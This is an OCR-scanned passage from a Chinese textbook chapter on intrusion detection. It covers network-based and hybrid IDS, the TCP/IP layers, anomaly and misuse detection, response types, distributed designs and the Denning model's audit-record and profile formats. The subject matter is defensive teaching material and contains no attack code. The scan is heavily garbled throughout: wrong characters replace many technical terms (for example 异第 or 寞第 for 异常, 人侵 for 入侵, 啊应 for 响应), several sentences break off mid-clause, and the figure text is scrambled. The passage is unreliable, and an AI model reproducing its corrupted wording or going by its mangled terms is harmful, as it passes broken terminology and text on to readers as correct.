2 基于 网 络 的 入 侵 检 测 系统 

基于 网 络 (Network-Based) 的 入侵 检测 系统 使 用 原始 数据 包 作为 数据 源 。 基 于 网 络 
的 入 侵 检测 系统 通常 利用 一 个 运行 在 混 末 模式 下 的 网 络 适 配 带 实时 监视 并 分 析 通 过 网 络 
的 所 有 通信 业务 。 

基于 网 络 的 IDS 不 依赖 于 被 保护 的 主机 操作 系统 ,能 检测 到 基于 主机 的 IDS 发 现 不 
丁 的 入 侵 攻 击 行为 ,并 且 由 于 网 络 监 听 右 对 入 侵 者 是 透明 的 ,使 得 监听 带 被 攻击 的 可 能 性 
大 大 减少 ,可 以 提供 实时 的 网 络 行为 检测 ,同时 保护 多 全 网 络 主机 以 及 具有 民 好 的 隐蔽 
性 ,但 另 一 方面 ,由 于 无 法 实现 对 加 密 信 道 和 某 些 基于 加 密 信 道 的 应 用 层 协 议 数据 的 解 
蜜 ,因此 网 络 监听 疮 对 其 不 能 进行 跟踪 ,导致 对 采 些 人 侵 攻 击 的 检测 率 较 低 。 

基于 网 络 的 人 侵 检 测 技术 ,其 核心 思想 是 ,在 网 络 环境 下 根据 相应 的 网 络 协议 和 工作 
原理 实现 对 网 络 数据 包 的 捕获 和 过 小, 并 进行 入侵 特征 识别 和 协议 分 析 , 从 而 检测 出 网 络 
中 存在 的 入 侵 行为 。 

1) 分 层 协 议 模 型 与 TCP/IP 协议 簇 

计算 机 网 络 的 整套 协议 是 一 个 庞大 复杂 的 体系 ,为 了 便于 对 协议 进行 描述 .设计 和 实 
现 ,现在 都 采用 分 层 的 体系 结构 ,主要 的 分 层 模型 有 开放 系统 互联 (COpen System Inter- 
connection ,OSI) 人 参考 模型 和 TCP/IP 模型 。OSI 参考 模型 是 国际 标准 化 组 织 (Interna- 
tional Organization for Standardization ,ISO) 在 1978 年 提出 的 一 套 非 常 重要 的 网 络 互 联 
标准 的 建议 ,但 目前 使 用 最 广泛 的 网 络 体系 结构 是 以 TCP/IP 协议 模型 为 基础 的 。 

TCP/IP 是 一 种 网 际 互联 通信 协议 。 运 行 TCP/IP 的 网 络 是 一 种 采用 包 ( 或 分 组 ) 交 
换 的 网 络 。 用 TCP/IP 实现 各 网 络 间 连 接 的 核心 思想 是 把 千差万别 的 低 两 层 (物理 层 和 
数据 链 路 层 ) 有 关 的 部 分 作为 物理 网 络 ,而 在 传输 层 / 网 络 层 建立 一 个 统一 的 虚拟 “逻辑 网 
络 ” ,以 这 样 的 方法 屏蔽 所 有 物理 网 络 的 便 件 差异 。TCP/IP 分 层 结 构 如 图 2-2 所 示 。 

TCP/IP 参考 模型 分 为 4 层 : 应 用 层 \ 传 输 层 、 网 际 层 、 网 络 接口 屋 。 其 中 各 层 的 功能 
分 配 如 下 。 
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TCP/IP 分 层 协议 
用 层 FTP | | SMTP DNS | | SNMP 


传输 层 TCP UDP 


IP, ICMP(RIP、OSPF) 


网 际 屋 


i 


ARP、RARP 


Token 
Ring 


Ethernet | | Loen FDDI | | WLAN 
Us 


图 2-2 TCP/IP 分 层 结构 


应 用 层 包 括 所 有 的 应 用 程序 协同 工作 ,利用 基础 网 络 交 换 应 用 程序 专用 的 数据 的 协 
以 ,主要 协议 如 下 。 

Q) HTTP(Hypertext Transfer Protocol , 超 文 本 传输 协议 ) 。 

HTTPS(Hypertext Transfer Protocol over Secure Socket Layer, 安 全 超 文本 传 
输 协 议 ) 。 

Telnet(Teletype over the Network ,远程 登录 协议 ) ,运行 在 TCP 上 。 

FTP(File Transfer Protocol, 文 件 传输 协议 ) ,运行 在 TCP 上 。 

SMTP(Simple Mail Transfer Protocol ,和 侧 音 邮 件 传 输 协 议 ) ,运行 在 TCP 上 。 

(@) DNSCDomain Name Service, 域 名 服务 ) ,运行 在 TCP 和 UDP 上 。 

(DD) NTP(Network Time Protocol, 网 络 时 间 协 议 ) ,运行 在 UDP 上 。 

SNMP(Simple Network Management Protocol, 徊 单 网 络 管理 协议 )，。 

传 竹 层 提供 问 到 端的 通信 ,主要 协议 如 下 。 

由 TCP(Transmission Control Protocol ,传输 控制 协议 ) 提 供 面 回 连接 的 .可 蚕 的 数 


UDP(CUser Datagram Protocol ,用户 数据 报 协 议 ) 提 供 无 连接 的 .不 可 徘 的 数据 报 


网 络 层 负 员 数 据 转 发 和 路 由 。 从 该 层 上 面 往 下 看 ,可 以 认为 研 下 存在 的 是 一 个 不 可 
菲 无 连接 的 端 对 病 的 数据 通路 。 最 核心 的 协议 是 卫 , 此 外 还 有 ICMP、RIP.OSPF \IS-IS、 
BGP、ARP 和 RARP 等 。 

物理 网 络 接口 层 负 责 对 使 件 的 访问 。 

在 整个 TCP/IP 协议 篮 中 ,有 以 下 两 个 核心 协议 。 

J 处 于 网 络 层 的 IP(Internet Protocol) 提供 数 据 报 服务 ,负责 网 际 主机 间 无 连接 ,不 
纠 针 的 网 际 寻 址 及 数据 报 传输 。IP 的 主要 功能 是 : IP 主要 承担 在 网 际 进行 数据 报 无 连 
接 的 传送 .数据 报 寻 址 和 差错 控制 ,通过 加 上 层 提 供 IP 数据 报 和 IP 地址 ,并 以 此 统一 各 
网 络 的 差异 。 

处 于 传输 层 的 TCP(Transmission Control Protocol) ,以 建立 虚 电 路 方式 提供 主 
机 之 间 可 菲 的 面 回 连接 服务 。 
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2) 网 络 数据 包 的 捕获 

网 络 数据 包 捕 获 机 制 是 网 络 信 侵 检测 系统 的 基础 。 通 过 捕获 整个 网 络 的 所 有 信息 流 
量 ,根据 信息 源 主机 、 目 标 主机 、 服 务 协 议 端口 等 信息 简单 过 滤 掉 不 关心 的 数据 ,再 将 用 户 
感 兴趣 的 数据 发 送 给 更 高 层 的 应 用 程序 进行 分 析 。 一 方面 ,要 能 保证 采用 的 捕获 机 制 能 
捕获 到 了 所 有 网 络 上 的 数据 包 , 尤 其 古 检测 到 被 分 片 的 数据 包 。 为 一 方面 ,数据 捕获 机 制 捕 
获 数 据 包 的 效率 也 很 重要 , 它 生 接 影 啊 整 个 网 络 人 侵 检测 系统 的 运行 速度 。 其 中 , 虽 探 辫 
Sniffer 是 一 种 常用 的 数据 捕 著 机 制 。 


3 基于 混合 数据 产 的 入 侵 检 测 系 统 

基于 混合 效 据 源 的 入 侵 检 测 系统 以 多 种 数据 源 为 检测 目标 ,提高 IDS 的 性 能 。 混 合 
数据 源 的 人 侵 检 测 系 统 可 配置 成 分 布 式 模式 ,通常 在 需要 监视 的 服务 冀 和 网 络 路 径 上 安 
污 监 视 模块 ,分 别 癌 管理 服务 右 报 告 及 上 传 证 据 ,提供 跨 平台 的 人 侵 监 视 解 决 方案 。 

混合 数据 源 的 人 侵 检 测 系 统 具 有 比较 全 面 的 检测 能 力 , 是 一 种 综合 了 基于 网 络 和 基 
于 主机 两 种 特点 的 混合 型 人 侵 检测 系统 , 既 可 以 发 现 网 络 中 的 攻击 信息 ,也 可 以 从 系统 日 
志 中 发 现 异常 情况 。 在 网 神 SecIDS 3600 人 侵 检 测 系统 用 户 手册 中 有 介绍 ,网 神 SecIDS 
3600 人 侵 检 测 系 统 可 以 提供 全 面 的 入 侵 监 控 。 事 件 类 别 监 控 模 块 不 仅 可 以 按照 用 户 征 
义 的 详细 统计 条 件 ,如 统计 特定 时 间 .事件 级 别 .攻击 类 型 .事件 的 源 、 目 的 IP, 源 、 目 的 端 
口 .事件 使 用 的 协议 等 信息 ,为 用 户 提 供 当 前 网 络 人 侵 事 件 的 详细 信息 ,帮助 管理 员 直 观 
地 了 解 最 新 安全 状况 ,而且 可 以 为 用 户 提 供 当 前 网 络 攻 击 事件 的 排行 榜 ,帮助 管理 员 实 时 
分 析 入 侵 特 征 ,保护 内 网 用 户 的 安全 。 


222 按 分 析 方 法 分 类 
根据 入 侵 检测 分 析 方法 的 不 同 ,可 将 入 侵 检测 系统 分 为 如 下 两 类 。 


1 异种 入 侵 检 测 系统 

异 第 检测 可 以 检测 寞 第 活动 的 发 生 , 当 发 现 异 第 活动 时 ,器 认 定 为 有 入 侵 行为 发 生 。 
要 检测 寞 第 的 行为 ,就 会 涉及 判断 入侵 行为 的 一 个 度 ( 浆 值 )。 措 第 人 侵 检 测 系 统 利用 被 
监控 系统 正 第 行为 的 信息 作为 检测 系统 中 入 侵 行为 和 异 第 活动 的 依据 。 在 异常 入 侵 检 测 
中 ,假定 所 有 入侵 行为 都 与 正常 行为 不 同 ,这 样 ,如 果 建 立 系统 正常 行为 的 轨迹 ,理论 上 束 
可 以 把 所 有 与 正常 轨迹 不 同 的 系统 状态 视 为 可 疑 企图 。 

异常 检测 有 很 多 方法 。 基 于 数据 挖 扎 的 异常 检测 方法 ,从 审计 数据 提取 数据 流 中 司 
兴趣 的 知识 ,把 它们 表示 为 概念 、 规 律 、 规 则 等 形式 ,用 这 些 知 识 判 断 寞 第 和 人 侵 行为 ;基于 
机 此 学 习 的 异常 检测 方法 采用 机 右 学 习 的 方法 建立 系统 的 入 侵 检测 系统 ,主要 靠 归 纳 学 
习 、 比 较 学 习 等 ;基于 特征 不 匹配 的 异常 检测 方法 ,从 一 个 或 多 个 数据 包 中 对 比 在 入 侵 规 
则 库 中 的 特征 串 ,如 未 相同 或 相似 ,就 判断 为 人 侵 行为 。 

对 寞 第 网 值 写 特征 的 选择 是 寞 第 入 侵 检测 的 关键 。 例 如 ,通过 流量 统计 分 析 将 寞 第 
时 间 的 异 第 网 络 流量 视 为 可 疑 。 寞 第 入 侵 检 测 方 法 的 优点 是 不 依赖 于 攻击 特征 , 立 足 于 
受 检测 的 目标 发 现 人 侵 行 为 。 如 何 对 检测 建立 异常 国 值 ,如 何 定义 正常 的 模式 ,降低 误 报 
率 , 午 是 目前 比较 难 解决 的 问题 。 异 第 入 侵 检测 的 局 限 是 并 非 所 有 的 人 侵 都 表现 为 弄 和希 ， 
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而 且 系统 的 轨迹 难以 计算 和 更 新 。 


2 误 用 入 侵 检测 系统 

误 用 检测 也 被 称 为 基于 知识 .特征 的 检测 手段 。 相 比 于 异常 检测 , 它 更 侧重 于 已 知 和 
侵 行为 的 模式 ,特征 ,将 这 些 模式 特征 用 各 种 方式 表达 出 来 ,形成 各 种 规则 。 误 用 入 侵 检 
测 系统 根据 已 知人 侵 攻击 的 信息 (如 知识 .模式 等 ) 检 测 系统 中 的 入 侵 和 攻击 。 在 误 用 入 
侵 检测 中 ,假定 所 有 入 侵 行为 和 手段 (及 其 变种 ) 都 能 够 表达 为 一 种 模式 或 特征 ,那么 所 有 
已 知 的 入侵 方法 都 可 以 用 匹配 的 方法 发 现 。 

误 用 检测 方法 的 核心 思想 是 已 知 入 侵 行为 ,并 拥有 已 知人 侵 行为 的 模式 ,这 样 就 可 以 
有 针对 性 地 查询 这 些 模式 ,保证 能 够 检测 到 大 部 分 已 知 的 入 侵 ,也 不 会 把 正常 的 访问 当成 
入 侵 行为 处 理 。 误 用 入 侵 检测 的 关键 是 如 何 表达 入 侵 的 模式 ,把 真正 的 入 侵 和 正常 行为 
区 分 开 。 其 优点 是 误 报 少 ,局 限 性 是 它 只 能 发 现 已 知 的 攻击 ,对 未 知 的 攻击 无 能 为 力 。 例 
如 ,入 侵 行为 的 变 体 就 比较 难 发 现 。 这 需要 模式 库 不 断 更 新 ,才能 有 效 地 检测 到 各 种 入 侵 
行为 。 

误 用 检测 的 一 些 方法 如 下 : 基于 条 件 概率 的 误 用 检测 ,利用 条 件 概率 的 方法 ,进行 入 
侵 检测 ;基于 专家 系统 的 误 用 检测 ,利用 专家 系统 提供 入 侵 知识 库 ,利用 已 有 的 知识 检测 
入 侵 行为 ;基于 神经 网 络 的 误 用 检测 ,神经 网 络 具有 可 训练 性 ,对 它 不 断 测试 .训练 可 以 达 
到 入 侵 检测 的 效果 。 


223 按 检测 方式 分 类 
根据 入 侵 检测 方式 的 不 同 , 可 将 入 侵 检 测 系统 分 为 如 下 两 类 。 


1 实时 检测 系统 

实时 检测 系统 也 称 为 在 线 检测 系统 ,通过 实时 监测 并 分 析 网 络 流量 .主机 审计 记录 及 
各 种 日 志 信 息 发 现 攻击 。 在 高 速 网 络 中 ,检测 率 难以 令 人 满意 ,但 随 着 计算 机 硬件 速度 的 
提升 ,对 入 侵 攻 击 进行 实时 检测 和 响应 成 为 可 能 。 实 时 的 入 侵 检 测 技 术 是 对 主机 中 的 数 
据 包 或 网 络 中 的 数据 包 等 进行 实时 分 析 , 快 速 响应 ,用 来 保护 系统 的 安全 。 这 种 实时 性 是 
在 一 定 的 条 件 下 ,一 定 的 系统 规模 中 具有 的 相对 实时 性 。 如 果 超 出 一 定 的 网 络 规模 ,这 种 
相对 的 实时 性 也 难以 保证 。 


2 非 实 时 检测 系统 
韭 实 时 检测 系统 也 称 为 离线 检测 系统 , 通 第 是 对 一 段 时 间 内 的 被 检测 数据 进行 分 析 
发 现 人 侵 攻 击 , 并 做 出 相应 的 处 理 。 这 种 检测 主要 为 事后 啊 应 服务 ,同时 它 也 可 以 通过 不 
断 地 完善 信息 (如 规则 库 中 的 规则 ,知识 库 中 的 知识 量 ) ,以 提 融 准确 广 。 非 实时 的 离线 批 
量 处 理 方式 虽然 不 能 及 时 发 现 人 侵 攻 击 , 但 可 以 运用 复杂 的 分 析 方 法 发 现 某 些 实 时 方式 
不 能 发 现 的 人 侵 攻 击 , 可 以 一 次 分 析 大 量 事件 ,系统 的 成 本 更 低 。 同 时 ,事后 的 检测 要 求 
记录 大 量 的 历史 数据 ,对 系统 的 要 求 比 较 高 ,分 析 的 数据 量 也 比较 大 。 因 此 ,这 种 技术 在 
早期 网 络 通信 和 量 不 是 很 大 的 情况 下 使 用 效果 比较 明显 。 
在 高 速 网 络 环境 下 ,因为 要 分 析 的 网 络 流量 非常 大 ,和 二 接 用 实时 检测 方式 对 数据 进行 
详细 的 分 析 是 不 现实 的 ,往往 是 用 在 线 检测 方式 和 离线 检测 方式 相 结合 ,用 实时 方式 对 数 
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据 进行 初步 的 分 析 ,对 那些 能 够 确认 的 人 侵 攻击 进行 报 过 , 对 可 疑 的 行为 髓 用 离线 的 方式 
作 进 一 步 的 检测 分 析 , 同 时 分 析 结 果 可 用 来 对 IDS 进行 更 新 和 补充 。 


224 按 检测 结果 分 类 
根据 入 侵 检 测 系 统 检测 结果 的 不 同 ,可 将 入 侵 检测 系统 分 为 如 下 两 类 ， 


1 二 分 类 入 侵 检测 系统 
二 分 类 入 侵 检 测 系统 只 提供 是 否 发 生 入 侵 攻 击 的 结论 性 判断 ,不 能 提供 更 多 可 读 的 、 
有 意义 的 信息 ,只 输出 有 无 人 侵 发 生 , 而 不 报告 具体 的 入 侵 行为 。 


2 多 分 类 入 侵 检 测 系 统 
多 分 类 入 侵 检测 系统 能 够 分 辨 出 当前 系统 遭受 的 人 侵 攻 击 的 具体 类 型 ,如 果 认 为 是 
非 正 党 行为 ,输出 的 不 仅 是 有 无 人 侵 发 生 ,而 且 会 报告 具体 的 入 侵 类 型 ,以 便于 安全 员 快 


225 按 啊 应 方式 分 类 
根据 检测 系统 对 入 侵 攻击 的 响应 方式 的 不 同 , 可 以 将 入侵 检 测 系统 分 为 如 下 两 类 。 


1 主动 的 入 侵 检 测 系统 

主动 的 入侵 检测 系统 在 检测 出 入侵 行为 后 ,可 自动 对 目标 系统 中 的 漏洞 采取 修补 . 强 
制 可 疑 用 户 ( 可 疑 的 入 侵 者 ) 退 出 系统 以 及 关闭 相关 服务 等 对 策 和 啊 应 措施 。 主 动 啊 应 是 
基于 已 经 检测 到 的 人 侵 行 为 采取 的 措施 ,一 般 可 以 分 为 以 下 5 类。 

1) 记录 事件 日 志 

对 人 侵 事件 记录 上 日志, 以 便 以 后 复查 .长 期 分 析 ; 在 用 户 的 行为 还 没 被 确定 为 人 侵 之 
前 ,记录 附加 日 志 , 以 帮助 收集 信息 。 最 好 把 日 志 记 录 在 专门 的 数据 库 中 ,这 样 可 起 到 长 

2) 修正 系统 

修正 系统 用 以 弥补 引起 攻击 的 缺陷, 这 种 保护 日 身 安 全 而 配置 的 “ 目 疗 ?系统 类 似 生 
物体 的 免疫 系统 ,可 以 辨认 出 问题 所 在 并 进行 隅 离 。 这 种 啊 应 方式 比较 中 性 ,也 是 最 佳 的 
啊 应 配置 。 由 于 入 侵 行为 的 不 断 变化 ,根据 入 侵 的 危害 程度 不 断 调整 啊 应 系统 的 策略 , 扩 
大 监控 入 侵 追 蹊 技术 研究 的 范围 ,做 出 恰当 的 应 对 措施 。 

3) 设计 诱骗 系统 获取 人 侵 信 息 

这 种 类 型 的 主动 啊 应 方式 主要 是 为 了 取得 入 侵 行 为 的 信息 。 这 种 方式 通常 采用 如 
“ 蜜 饶 ” 这 类 诱骗 技术 ,使 攻击 者 主动 攻击 ,用 以 采集 信息 ,进而 追查 到 攻击 者 。 可 以 在 系 
统 受到 危害 或 受 损 失 时 提供 法 律 依据 。 

4) 蔡 止 被 攻击 对 象 的 特定 端口 或 服务 

关闭 已 受 攻 击 的 特定 端口 或 服务 ,可 以 避免 影响 其 他 服务 。 必 要 时 可 以 停止 已 受 攻 
击 的 主机 ,以 免 其 他 主机 受 影响 。 

5) 阳 离 人 侵 者 的 IP 地 址 

已 经 查 到 入 侵 的 IP 地 址 ,可 以 通过 重新 配置 边缘 路 由 需 、 交 换 机 或 防火 墙 , 以 阻 断 该 
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IP 地 址 的 数据 包 进 入 ,以免 受到 更 严重 的 攻击 。 


2 被 动 的 入 侵 检测 系统 
被 动 的 入侵 检测 系统 在 检测 出 对 系统 的 人 侵 攻 击 后 ,只 是 产生 报警 信息 通知 系统 安 


全 管理 员 , 之 后 的 处 理工 作 由 系统 管理 员 完 成 。 

早期 应 用 在 入 侵 检测 系统 中 的 啊 应 部 分 ,部 是 米 用 被 动 啊 应 的 方式 实现 的 。 被 动 啊 
应 只 起 为 用 户 提供 通知 或 警报 的 作用 ,主要 由 用 户 上 月 己 决 定 用 什么 方式 或 措施 应 对 这 种 
入 侵 行 为 。 一 般 采 取 的 末 略 可 以 分 为 以 下 两 种 。 

1) 堵 报 或 通知 

警报 是 被 动 啊 应 系统 中 使 用 最 多 ,也 是 最 有 效 的 方式 。 一 般 警 报 显 示 在 界面 上 ,提示 
用 户 受 到 条 类 攻击 ,应 该 采取 什么 梓 的 接 施 。 私 报 还 可 以 采取 其 他 方式 ,如 及 用 声 首 报 
警 .电子 邮件 等 方式 通知 网 络 管理 员 或 信息 安全 人 员 。 这 些 警 报 可 以 根据 入 侵 的 危害 程 
度 分 级 提交 ,使 省 理 员 人 处理 问题 时 有 主 次 之 分 。 

2) 利用 网 络 管理 协议 

检测 系统 可 以 设计 成 和 网 络 定理 工具 协同 工作 的 方式 ,这 样 可 以 充分 利用 网 络 协议 
的 标准 化 特色 ,更 准确 地 在 网 络 控制 侣 上 显示 警报 和 发 送信 息 。 目 前 商业 上 已 经 有 应 用 
网 络 管理 协议 的 产品 出 现 。 


226 按 分 布 方式 分 类 
根据 系统 各 个 模块 运行 的 分 布 方式 不 同 , 可 将 入 侵 检测 系统 分 为 如 下 两 类 。 


1 集中 式 入 侵 检测 系统 

系统 的 各 个 模块 (包括 数据 的 收集 与 分 析 以 及 啊 应 ) 都 集中 在 一 人 台 主 机 上 运行 ,这 种 
方式 适用 于 网 络 环境 比较 催 单 的 情况 。 

集中 式 的 网 络 人 侵 检 测 一 般 指 将 网 络 中 的 数据 包 作为 数据 源 进行 分 机 。 对 数据 进行 
米 集 、 过 滤 , 对 网 络 的 疾 口 进行 监控 。 它 是 按 一 定 规 则 从 网 络 中 获取 与 攻击 安全 性 相关 的 
数据 包 ,然后 对 传人 的 数据 用 和 人 侵 分 析 引 车 进行 分 析 , 最 后 把 分 析 结 采 输 出 或 通知 管理 
员 。 集 中 式 的 网 络 入 侵 检测 的 精确 度 比 较 差 ,而 且 无 法 知 介 主机 内 部 网 络 用 尸 对 系统 的 
安全 威胁 。 

2 分 布 式 入 侵 检测 系统 

系统 的 各 个 模块 分 布 在 网 络 中 不 同 的 计算 机 .设备 上 。 一 般 来 说 ,分 布 性 主要 体现 在 
数据 收集 模块 上 ,如 采 网 络 环境 比较 复杂 数据 量 比较 大 ,那么 数据 分 析 模 块 也 会 分 布 , 一 
般 是 按照 层次 性 的 原则 进行 组 织 的 。 

分 布 式 网 络 人 侵 检 测 系统 通 稼 由 多 个 模块 组 成 ,这 些 模块 一 般 分 布 在 网 络 的 不 同位 
置 ,分 别 完成 数据 的 收集 .数据 分 析 ,控制 输出 分 析 结果 等 功能 。 分 布 式 人 侵 检 测 系 统 与 
传统 的 网 络 入 侵 检 测 系 统 相 比 有 多 个 优点 : 首先 ,由 于 采用 分 布 式 , 与 采用 单 台 主机 的 情 
况 相 比 能 明显 减少 主机 的 压力 ;其 次 ,分 布 式 IDS 的 可 扩展 性 将 大 大 提高 ;最 后 ,对 于 集 
中 式 的 IDS 面临 突出 的 单 点 失效 问 题 也 能 有 歼 地 解决 。 不 过 ,分 布 式 IDS 技术 要 求 比 较 
珊 , 各 个 组 件 之 间 的 协调 比较 困难 ,需要 研究 如 何 合理 地 绪 合 这 些 组 件 ,使 该 系统 的 性 能 、 
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负载 等 达到 最 优 。 


2.3 人 入侵 检测 系统 的 基本 模型 


在 人 侵 检 测 系 统 的 发 展 历程 中 ,大 致 经 历 了 3 个 阶段 : 集中 式 阶 段 . 层 次 化 阶段 和 集 
成 式 阶段 。 代 表 这 3 个 阶段 的 入 侵 检 测 系统 的 基本 模型 分 别 是 通用 入侵 检测 模型 (Den- 
ning 模型 )\ 层 次 化 人 侵 检 测 模型 (IDM) 和 管理 式 人 侵 检 测 模 型 (SNMP-IDSM)。 下 面 简 
要 介绍 这 3 个 基本 模型 。 


231 通用 入 侵 检 测 模型 


1984 一 1986 年 ,在 美国 海军 空间 和 海 车 战争 系统 司令 部 (SPAWARS) 的 资助 下 ， 
Dorothy Denning 研究 并 发 展 了 一 个 通用 入 侵 检 测 系 统 模型 ,如 图 2-3 所 示 。 该 模型 提出 
了 异 背 活动 和 计算 机 不 正当 使 用 之 间 的 相关 性 , 它 独 立 于 任何 特殊 的 系统 .应 用 环境 、 系 
统 脆 罚 性 或 入 侵 种 类 ,因此 提供 了 一 个 通用 的 人 侵 检 测 系 统 框 桨 。Denning 模型 能 够 检 
测 出 味 客 人 侵 .越权 操作 及 其 他 种 类 的 非 正 营 使 用 计算 机 系统 的 行为 。 该 模型 基于 的 假 
设 是 : 对 计算 机 安全 的 入 侵 行为 可 以 通过 检查 一 个 系统 的 审计 记录 ,从 中 辨识 异常 使 用 
系统 的 入 侵 行为 并 加 以 发 现 。Denning 提出 的 模型 是 一 个 基于 主机 的 入 侵 检 测 模型 。 前 
先 对 主机 事件 按照 一 定 的 规则 学 习 产 生 用 户 行 为 模型 (Activity Profile) ,然后 将 当前 的 
事件 和 模型 进行 比较 ,如 果 不 匹配 , 则 认为 异常 。 


规则 设计 与 更 新 


规则 集 
处 理 引 擎 


活动 简 档 上 新 活动 简 档 


图 2-3 通用 人 侵 检 测 系 统 模型 
该 模型 由 以 下 6 个 主要 部 分 组 成 。 


1 主体 
主体 (Subject) 是 指 系统 操作 的 主动 发 起 者 ,是 在 目标 系统 上 活动 的 实体 。 例 如 , 计 
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算 机 操作 系统 的 进程 .网 络 的 服务 连接 等 。 


2 对 象 

对 象 (Object) 是 指 系统 所 管理 的 资源 ,如 文件 ,设备 ,命令 等 。 

3 审计 记录 

审计 记录 (Audit Record) 是 指 a 如 用 户 注 册 、 
命令 执行 和 文件 访问 等 。 审 计 记 录 是 一 个 六 元 组 ,其 其 格式 为 二 Subject， Action, Object， 


ea, 其 中 各 字段 的 含义 如 下 。 

(1) Subject: 主体 ,是 指 活动 (Action) 的 发 起 者 。 

(2) Action: 活动 ,是 指 主体 对 目标 实施 的 操作 。 对 操作 系统 而 言 ,这些 操作 包括 读 、 
写 、 登录. 退出 等 。 

(3) Object: 对 销 , 是 指 活动 的 承受 者 。 

(4) Exception-Condition: 异常 条 件 , 是 指 系统 对 主体 的 活动 的 异常 报告 ,如 违反 系 
统 读 写 权限 规则 等 。 

(5) Resource-Usage: 资源 使 用 状况 ,是 指 系 统 的 资源 消耗 情况 ,如 CPU,、 内 存 使 用 
(6) Time-Stamp: 时 间 蕉 ,是 指 活动 的 发 生 时 间 。 
4 活动 简 档 
活动 简 档 (Activity Profile) 用 以 保存 主体 正常 活动 的 有 关 信 息 , 其 具体 实现 依赖 于 
检测 方法 。 在 统计 方法 中 从 事件 数量 . 频 度 ,资源 消耗 等 方面 度量 ,可 以 使 用 方差 ,马尔 可 
夫 模 型 等 方法 实现 。 活 动 简 档 定义 了 3 种 类 型 的 随机 变量 ,分 别 如 下 。 

(1) 事件 计数 需 (Event Counter) : 简单 地 记录 特定 事件 的 发 生 次 数 。 

(2) 间 隅 计数 古 (Interval Timer): 记录 特定 事件 此 次 发 生 和 上 次 发 生 之 间 的 时 间 
加 隔 。 

(3) 资源 计量 人 舌 (Resource Measure) : 记录 某 个 时 间 内 特定 动作 所 消耗 的 资源 量 。 

活动 简 档 的 格式 为 ， 三 Variable-Name,， Action-Pattern,， Exception-Pattern,， 
Resource-Usage-Pattern, Period, Variable-Type, Threshold, Subject-Pattern, Object- 
Pattern，Value 二 。 其 中 各 字段 的 含义 如 下 。 

(1) Variable-Name: 杰 量 名 ,是 识别 活动 向 档 的 标志 。 

(2) Action-Pattern: 活动 模式 ,用 来 匹配 审计 记录 的 零 个 或 多 个 活动 的 模式 

(3) Exception-Pattern: 异常 模式 ,用 来 匹配 审计 记录 中 的 异常 情况 的 模式 。 

(4) Resource-Usage-Pattern: 资源 使 用 模式 ,用 来 匹配 审计 记录 中 的 资源 使 用 模式 。 

(5) Period: 测量 的 间隔 时 间或 者 取样 时 间 。 

(6) Variable-Type: 一 种 抽象 的 数据 类 型 ,用 来 定义 一 种 特定 的 变量 和 统计 模型 。 

(7) Threshold: 立 值 , 指 统 计 测 试 中 一 种 表示 异常 的 参数 值 。 

(8) et 主体 模式 ,用 来 匹配 审计 记录 中 主体 的 模式 ,是 识别 活动 简 档 
的 标志 。 

(9) Object-Pattern: 对 和 象 模式 ,用 来 匹配 审计 记录 中 对 象 的 模式 ,是 识别 活动 倍 档 的 
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标志 。 
(10) Value: 当前 观测 值 和 统计 模型 使 用 的 参数 值 。 例 如 ,在 平均 值 和 标准 差 模 型 
中 ,这 些 参数 可 能 是 变量 和 或 者 是 变量 的 平方 和 。 


5 异 弟 记录 

异 第 记录 (Anomaly Record) 用 以 表示 异 篆 事件 的 发 生 情 况 ,其 格式 为 : 过 Event， 
Time-Stamp，Profile 盖 。 其 中 各 种 字段 的 含义 如 下 。 

(1) Event: 指明 寻 致 异 向 的 事件 ,如 审计 数据 。 

(2) Time-Stamp: 产生 异常 事件 的 时 间 稚 。 

(3) Profile: 检测 到 异常 事件 的 活动 侧 档 。 


6 活动 规则 

活动 规则 指明 当 一 个 审计 记录 或 寞 第 记录 产生 时 应 采取 的 动作 。 规 则 集 是 检查 入侵 
是 人 耕 发 生 的 处 理 引 擎 ,结合 活动 何 档 用 专家 系统 或 统计 方法 等 分 析 接 收 到 的 审计 记录 , 调 
整 内 部 规则 或 统计 信息 ,在 判断 有 入 侵 发 生 时 了 采取 相应 的 措施 。 规 则 由 条 件 和 动作 两 部 
分 组 成 。 共 有 4 种 类 型 的 规则 ,分 别 如 下 。 

(1) 审计 记录 规则 (Audit-Record Rule): 触发 新 生成 的 审计 记录 和 动态 的 活动 简 档 
之 间 的 匹配 以 及 更 新 活动 向 档 和 检测 异 间 行为 。 

(2) 定期 活动 更 新 规则 (Periodic-Activity-Update Rule): 定期 触发 动态 活动 向 档 中 
的 匹配 以 及 更 新 活动 倍 档 和 检测 异 第 行为 。 

(3) 异 第 记录 规则 (Anomaly-Record Rule) : 触发 异常 事件 的 发 生 , 并 将 异 第 情况 报 
告 给 安全 管理 员 。 

(4) 定期 异常 分 析 规 则 (Periodic-Anomaly-Analysis Rule): 定期 触发 产生 当前 发 生 

Denning 模型 实际 上 是 一 个 基于 规则 的 匹配 模式 系统 ,不 是 所 有 的 IDS 都 能 够 完全 
侍 合 该 模型 。Denning 模型 最 大 的 缺点 在 于 ,其 没有 包含 已 知 系 统 源 洞 或 攻击 方法 的 赂 
识 ,而 这 些 知识 在 许多 情况 下 是 非 第 有 用 的 信息 。 
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针对 基于 Denning 的 网 络 入 侵 检测 系统 存在 的 问题 ,设计 了 层次 化 入 侵 检 测 系 统 , 该 
系统 主要 基于 两 种 不 同 的 入侵 检测 素 略 , 即 寞 常 检 测 和 误 用 检测 。 这 两 种 技术 分 别 有 利 
于 已 知 的 和 未 知 的 两 种 入 侵 行为 判定 ,而 其 差 寞 性 市 来 了 检测 的 层次 性 。 一 般 来 说 , 误 用 
检测 比较 简单 ,效率 也 较 融 , 误 报 率 较 低 ; 而 寞 第 检测 主要 针对 一 些 疑 难 的 、 未 知 的 情 帝 。 
根据 以 上 素 略 ,将 入 侵 检 测 动 态 地 分 为 攻击 检测 和 入 侵 检 测 。 所 请 攻击 检测 ,是 指 在 入 侵 
检测 系统 中 已 经 有 对 此 种 人 侵 的 摘 述 ,并 且 利 用 误 用 检测 方法 可 以 将 其 检测 出 来 ;而 所 谓 
入 侵 检 测 ,是 在 人 侵 检 测 系统 中 没有 对 此 种 人 侵 的 摘 述 ,利用 误 用 检测 方法 无 法 将 其 检测 
出 来 ,只 能 用 开 音 检测 方法 确定 其 是 否 为 入侵 行为 。 但 这 种 分 类 行为 是 动态 的 ,特别 征 对 
于 一 些 介 于 非 安 全 行为 和 安全 行为 之 间 的 “灰色 地 市 "中 的 行为 ,可 能 在 人 侵 检 测 系统 还 
不 十 分 完善 的 情况 下 只 能 定位 为 人 侵 , 而 随 春 入侵 检测 手段 的 不 断 进 步 , 误 用 数据 库 的 不 
